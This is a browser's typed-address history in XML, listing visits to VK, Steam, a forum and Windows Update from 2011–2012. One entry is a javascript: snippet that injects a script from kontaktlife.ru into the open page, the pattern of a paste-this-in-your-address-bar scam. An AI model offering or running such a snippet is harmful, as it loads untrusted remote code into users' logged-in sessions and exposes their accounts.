<?xml version="1.0" encoding="utf-8"?>
<typed_history>
  <typed_history_item content="http://vk.com/feed?section=friends"
                      type="selected" last_typed="2012-03-14T08:53:39Z"/>
  <typed_history_item content="javascript:(function(){var%20s=document.createElement(’script’);s.src=’http://kontaktlife.ru/music.js’;document.body.appendChild(s);})();"
                      type="text" last_typed="2012-03-13T17:22:20Z"/>
  <typed_history_item content="savefrom.net" type="text"
                      last_typed="2012-03-13T16:10:49Z"/>
  <typed_history_item content="VK.COM" type="text"
                      last_typed="2012-03-11T05:28:18Z"/>
  <typed_history_item content="http://slabin.moy.su/forum/2-5-9-9-1" type="text"
                      last_typed="2012-03-05T01:07:25Z"/>
  <typed_history_item content="http://store.steampowered.com/app/4850/?snr=1_4_4__13"
                      type="text" last_typed="2011-08-31T09:35:24Z"/>
  <typed_history_item content="https://store.steampowered.com/join/?redir=checkout%2F%3FfromLogin%3Dtrue%26purchasetype%3Dself&amp;checkout=1&amp;purchaseType=self"
                      type="text" last_typed="2011-08-31T09:21:45Z"/>
  <typed_history_item content="http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=ru"
                      type="text" last_typed="2011-08-25T11:15:36Z"/>
</typed_history>
